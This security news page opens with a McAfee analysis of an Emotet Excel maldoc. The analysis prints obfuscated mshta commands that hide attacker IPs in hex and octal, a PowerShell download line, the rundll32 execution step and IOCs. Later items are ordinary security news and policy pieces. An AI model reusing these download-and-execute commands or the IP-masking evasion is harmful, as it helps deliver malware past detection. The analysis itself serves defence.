Emotet’s Uncommon Approach of Masking IP Addresses

Read Time:3 Minute, 26 Second

Authored By: Kiran Raj

In a recent campaign of Emotet, McAfee Researchers observed a change in techniques. The Emotet maldoc was using hexadecimal and octal formats to represent IP address which is usually represented by decimal formats. An example of this is shown below:

Hexadecimal format: 0xb907d607

Octal format: 0056.0151.0121.0114

Decimal format: 185.7.214.7

This change in format might evade some AV products relying on command line parameters but McAfee was still able to protect our customers. This blog explains this new technique.

Figure 1: Image of Infection map for EMOTET Maldoc as observed by McAfee

Threat Summary

The initial attack vector is a phishing email with a Microsoft Excel attachment. 
Upon opening the Excel document and enabling editing, Excel executes a malicious JavaScript from a server via mshta.exe 
The malicious JavaScript further invokes PowerShell to download the Emotet payload. 
The downloaded Emotet payload will be executed by rundll32.exe and establishes a connection to adversaries’ command-and-control server.

Maldoc Analysis

Below is the image (figure 2) of the initial worksheet opened in excel. We can see some hidden worksheets and a social engineering message asking users to enable content. By enabling content, the user allows the malicious code to run.

On examining the excel spreadsheet further, we can see a few cell addresses added in the Named Manager window. Cells mentioned in the Auto_Open value will be executed automatically resulting in malicious code execution.

Figure 3- Named Manager and Auto_Open triggers

Below are the commands used in Hexadecimal and Octal variants of the Maldocs

FORMAT
OBFUSCATED CMD
DEOBFUSCATED CMD

Hexadecimal
cmd /c m^sh^t^a h^tt^p^:/^/[0x]b907d607/fer/fer.html
http://185[.]7[.]214[.]7/fer/fer.html

Octal
cmd /c m^sh^t^a h^tt^p^:/^/0056[.]0151[.]0121[.]0114/c.html
http://46[.]105[.]81[.]76/c.html

Execution

On executing the Excel spreadsheet, it invokes mshta to download and run the malicious JavaScript which is within an html file.

Figure 4: Process tree of excel execution

The downloaded file fer.html containing the malicious JavaScript is encoded with HTML Guardian to obfuscate the code

Figure 5- Image of HTML page viewed on a browser

The Malicious JavaScript invokes PowerShell to download the Emotet payload from “hxxp://185[.]7[.]214[.]7/fer/fer.png” to the following path “C:UsersPublicDocumentsssd.dll”.

cmd line
(New-Object Net.WebClient).DownloadString(‘http://185[.]7[.]214[.]7/fer/fer.png’)

The downloaded Emotet DLL is loaded by rundll32.exe and connects to its command-and-control server

cmd line
cmd  /c C:WindowsSysWow64rundll32.exe C:UsersPublicDocumentsssd.dll,AnyString

IOC

TYPE
VALUE
SCANNER
DETECTION NAME

XLS
06be4ce3aeae146a062b983ce21dd42b08cba908a69958729e758bc41836735c
McAfee LiveSafe and Total Protection
X97M/Downloader.nn

DLL
a0538746ce241a518e3a056789ea60671f626613dd92f3caa5a95e92e65357b3
McAfee LiveSafe and Total Protection

 

Emotet-FSY

HTML URL
http://185[.]7[.]214[.]7/fer/fer.html

http://46[.]105[.]81[.]76/c.html

WebAdvisor
Blocked

DLL URL
http://185[.]7[.]214[.]7/fer/fer.png

http://46[.]105[.]81[.]76/cc.png

WebAdvisor
Blocked

MITRE ATT&CK

TECHNIQUE ID
TACTIC
TECHNIQUE DETAILS
DESCRIPTION

T1566
Initial access
Phishing attachment
Initial maldoc uses phishing strings to convince users to open the maldoc

T1204
Execution
User Execution
Manual execution by user

T1071
Command and Control
Standard Application Layer Protocol
Attempts to connect through HTTP

T1059
Command and Scripting Interpreter
Starts CMD.EXE for commands execution
Excel uses cmd and PowerShell to execute command

T1218

 

Signed Binary Proxy Execution
Uses RUNDLL32.EXE and MSHTA.EXE to load library
rundll32 is used to run the downloaded payload. Mshta is used to execute malicious JavaScript

Conclusion

Office documents have been used as an attack vector for many malware families in recent times. The Threat Actors behind these families are constantly changing their techniques in order to try and evade detection. McAfee Researchers are constantly monitoring the Threat Landscape to identify these changes in techniques to ensure our customers stay protected and can go about their daily lives without having to worry about these threats.

The post Emotet’s Uncommon Approach of Masking IP Addresses appeared first on McAfee Blog.

Read More

FBI’s warning about Iranian firm highlights common cyberattack tactics

Read Time:35 Second

The US Federal Bureau of Investigation (FBI) has released a warning outlining the TTP (tactics, techniques, and protocols) of Iran-based Emennet Pasargad, reportedly a cybersecurity and intelligence firm servicing Iranian government agencies, to help recipients inform and defend themselves against the group’s malicious activities. 

In the FBI’s Private Industry Notification, the agency confirms that two Iranian nationals employed by Emennet were charged with cyberintrusion and fraud, voter intimidation, interstate threats, and conspiracy by the US Department of Justice.

Additionally, the Department of Treasury Office of Foreign Assets Control alleges that  Emennet, along with the two accused Iranian nationals, attempted to influence the 2020 US presidential elections. 

To read this article in full, please click here

Read More

Major Vulnerability Found in Argo CD

Read Time:1 Minute, 49 Second

Major Vulnerability Found in Argo CD

Security researchers at Apiiro have discovered a significant software supply chain zero-day vulnerability in the popular open-source continuous delivery platform, Argo CD.

Used by thousands of organizations globally, Argo CD is a tool that reads environment configurations (written as a helm chart, kustomize files, jsonnet or plain YAML files) from git repositories and applies it Kubernetes namespaces. The platform can manage the execution and monitoring of application deployment post-integration.

The flaw (CVE-2022-24348) lets attackers access and exfiltrate sensitive information such as passwords and API keys.

“A 0-day vulnerability, discovered by Apiiro’s Security Research team, allows malicious actors to load a Kubernetes Helm Chart YAML file to the vulnerability and ‘hop’ from their application ecosystem to other applications’ data outside of the user’s scope,” wrote researchers.

Exploitation of the flaw can lead to privilege escalation, sensitive information disclosure, lateral movement attacks and more.

The attack begins with the threat actor constructing a malicious Kubernetes Helm Chart-a YAML file that embeds different fields to form a declaration of resources and configurations needed in order for deploying an application.

Using the Helm Chart, the attacker builds a dummy configuration to exploit a parsing confusion vulnerability to access restricted information.

Finally, the attacker extracts sensitive data such as API keys and passwords that can be leveraged to carry up follow-up attacks and facilitate lateral movement inside the victim’s network. 

Apiiro reported the attack to Argo CD on January 30 2022. After discussing the vulnerability’s extent and impact, the vendor created a patch to fix the problem. Advisories and the patch were released on Thursday. 

Apiiro’s research team praised Argo CD’s incident response and “professional handling of the case.”

“We are seeing more advanced persistent threats that leverage zero day and known, unmitigated vulnerabilities in software supply chain software such as Argo CD,” commented Yaniv Bar-Dayan, CEO and co-founder at Vulcan Cyber.

He added: “For years, known, unmitigated vulnerabilities have contributed more than any other factor to mounting cyber risk. But hackers are always looking for the most-effective path of least resistance to attain their objectives.”

Read More

Nord Security and Surfshark to Merge

Read Time:1 Minute, 50 Second

Nord Security and Surfshark to Merge

Lithuanian-based cybersecurity companies and rival virtual private network (VPN) providers Nord Security and Surfshark have finalized a merger agreement.

The companies said that the merger would “open new technical knowledge-sharing opportunities and enable more focused market diversification.” Both companies will continue to operate autonomously and maintain separate infrastructure and product roadmaps.

Since both companies are privately owned entities, the transaction details have not been disclosed. 

Nord Security was established in 2012 and now has 1,000 employees who support 15 million users worldwide. The company is known for its VPN service NordVPN, freemium VPN provider Atlas VPN, password manager NordPass, encrypted cloud storage NordLocker and the advanced network access security solution NordLayer.

According to a post on its website about the merger, Nord Security was impressed by the fast growth of Surfshark and the expertise and professionalism of its team. 

“The increasing complexity of cybersecurity and digital privacy is a growing challenge worldwide. We believe that this industry requires radical simplification and ease of access, both for consumers and businesses,” said Tom Okman, the co-founder of Nord Security.

Surfshark was developed with the assistance of Lithuanian business incubator Tesonet, which also helped NordVPN to grow.

He added: “Together, Nord Security and Surfshark create the largest internet security powerhouse in the market, ready to bring advanced solutions for customers.” 

Nord Security said that while both companies will work independently to improve their own products, they will consolidate their resources to reach mutual goals and innovate within the cybersecurity industry.

Smaller fish Surfshark launched in 2018 and employs around 200 people. The company delivers software solutions and was a founding member of the VPN Trust Initiative. It is known for its Surfshark One suite, which bundles an award-winning VPN, antivirus, private search tool and data leak detection system alert to provide cybersecurity protection.

“Consolidations in the global consumer cybersecurity market indicate the industry’s maturity. They also bring new competitive challenges,” said Vytautas Kaziukonis, founder and CEO of Surfshark.

They added: “Nord Security and Surfshark joining forces will set the ground to scale in different digital security dimensions, which is necessary to meet the growing requirements of our customers.”

Read More

Tennessee College Hit with Ransomware

Read Time:1 Minute, 44 Second

Tennessee College Hit with Ransomware

A cyber-attack on a community college in Tennessee may have exposed the personal data of students, staff and faculty. 

Attackers struck Pellissippi State Community College (PSCC) with ransomware on December 5 2021. The digital assault shut down online network connections to all five of its campuses during finals week, disrupting online exams. 

All the college’s connected PC workstations and most of its servers, including the operating system and files, were encrypted. The attackers also changed the passwords of every user.

“What I can say is that this is not going to be a quick fix,” said Pellissippi State vice president for academic affairs, Kellie Toon, at the time of the attack.

“There have been other schools hit and just by all indications in can take months to rebuild it. We can rebuild it. We will rebuild it … but it’s going to take time. ” 

The attack left staff and some of the college’s 11,000 students unable to access email or the Microsoft communications platform Teams. 

The college launched an investigation into the cyber-attack to gauge its impact. On February 1, PSCC began informing an unspecified number of individuals that their sensitive information may have been compromised in the attack. 

A notice on the college’s website states: “Our investigation confirmed that the attacker had access to our Active Directory database, which includes first and last name; PSCC username; PSCC email address; office location and phone number; job title and department (if an employee); P number (a unique number assigned to each student and employee used only at PSCC and not used to sign documents); General user ID number (a long random string of numbers used only by PSCC in its Banner system); and PSCC account password (hashed).”

The college added that cyber-criminals may have also been able to access “other personal data in our system.”

PSCC said that the individuals whose data may have been accessed and acquired in the attack included former and current students, faculty, staff and participants in Tennessee Consortium for International Studies (TNCIS) programs.

Read More

#Enigma2022: Security’s Role in Helping HealthTech Find Its Way

Read Time:2 Minute, 38 Second

#Enigma2022: Security’s Role in Helping HealthTech Find Its Way

Securing healthcare technologies is critical to human health and safety, not just in the medical setting but also with consumer HealthTech.

In an afternoon session on February 3 at the Engima 2022 conference, Joy Forsythe, director of security at Alto Pharmacy, explained that HealthTech is a growing area of healthcare products and services targeted at consumers that are available outside traditional medical establishments. HealthTech can include online medical services and both software and hardware-based human health monitoring technologies.

Forsythe pointed out that any information collected about a person’s health by a healthcare provider or medical professional that has a direct relationship with a patient is often considered in the US to be protected health information. The US Government rules to protect such information is referred to HIPAA (Health Insurance Portability and Accountability Act).

She noted that it’s not always clear what rules apply when it comes to HealthTech services and devices.

Forces Impacting Security in the Healthcare Ecosystem

Forsythe identified regulations as critical among the primary forces that impact security across the healthcare landscape.

While HIPAA outlines user privacy, other regulations include guidance on security practices issued by the US Department of Health and Human Services (HHS). For example, Forsythe noted that HSS has established that fax is considered a secure transmission method if the recipient’s fax number can be confirmed.

“Generally speaking in healthcare, if you verify that the fax number is correct, that’s considered secure,” she said. “If there’s a breach because of a fax that was sent to the correct phone number, the provider is not liable.”

While fax is an outdated decades-old technology, the HSS guidance on email for secure data transmission is less specific. As a result, Forsythe stressed, many healthcare entities in the US had banned email for sending personal health information.

Industry certification is another strong force that security needs to deal with for healthcare security.

“Certification is an attempt to standardize third-party risk assessments and simplify vendor management,” Forsythe said. “But certification often pushes outdated security controls, and they failed to reduce risk in modern environments.”

How HealthTech Can Improve Security

Not all HealthTech devices are bound by the same regulations in the US as technologies and services directly provided by medical professionals.

“Consumer wellness startups are not acting as healthcare providers, and they may not be subject to HIPAA for a while,” she commented. “They still have to abide by other privacy laws that are often less burdensome.”

The opportunity for security people in HealthTech is to actually really do the risk identification for the privacy rules that are in place, such as CCPA in California or GDPR in Europe.

It’s also important that HealthTech providers track which data is identifiable because that’s the data that matters for privacy. Additionally, she recommends that HealthTech providers enable an auditable record of all access to user data by services, employees and partners.

Forsythe concluded by emphasing the role that security can bring HealthTech: “I think there’s still a lot of opportunity for security to come into HealthTech organizations and make a difference in how they handle data.” 

Read More

The EARN IT Act Is Back

Read Time:45 Second

Senators have reintroduced the EARN IT Act, requiring social media companies (among others) to administer a massive surveillance operation on their users:

A group of lawmakers led by Sen. Richard Blumenthal (D-CT) and Sen. Lindsey Graham (R-SC) have re-introduced the EARN IT Act, an incredibly unpopular bill from 2020 that was dropped in the face of overwhelming opposition. Let’s be clear: the new EARN IT Act would pave the way for a massive new surveillance system, run by private companies, that would roll back some of the most important privacy and security features in technology used by people around the globe. It’s a framework for private actors to scan every message sent online and report violations to law enforcement. And it might not stop there. The EARN IT Act could ensure that anything hosted online — backups, websites, cloud photos, and more — is scanned.

Slashdot thread.

Read More

US Accuses Russia of Disinformation Plot to Justify Invasion of Ukraine

Read Time:1 Minute, 40 Second

US Accuses Russia of Disinformation Plot to Justify Invasion of Ukraine

The United States has accused Russia of a disinformation plot to serve as a pretext to an invasion of Ukraine.

This would be a video purporting to show a Ukrainian attack on Russian territory or against Russian-speaking people in Eastern Ukraine. According to the US government, the fabricated video would be highly graphic, including images of dead bodies.

On Thursday, Pentagon spokesman John Kirby told reporters: “We do have information that the Russians are likely to want to fabricate a pretext for an invasion.

“As part of this fake attack, we believe that Russia would produce a very graphic propaganda video, which would include corpses and actors that would be depicting mourners and images of destroyed locations.”

The US government added that it revealed the plans to help prevent conflict from breaking out in the region. However, no evidence was provided to support its claim, which Russia has denied.

The BBC reported that senior US officials believe the video is just one of a number of ideas Russia has to provide a pretext to invade Ukraine.

The claim has come amid mounting tension in the region, which has led to a massive build-up of Russian troops on its border with Ukraine.

Jake Moore, global cybersecurity advisor at ESET, noted that advancements in deepfake technologies are facilitating the use of fabricated videos, potentially to provoke war. “This reported use of deep fakery would highlight the extreme and dramatic turn in the nature of warfare that we are witnessing. Being able to drum up fear is often as powerful as the attack itself. In this new age of deepfake weaponry, it could worryingly not be too long before we have no idea what is real, making nation-state attacks even more difficult to protect from or predict,” he commented.

Russia has been accused of targeting Ukraine with numerous cyber-attacks in recent weeks, including forcing more than a dozen government websites offline.

Read More

News, Advisories and much more

Exit mobile version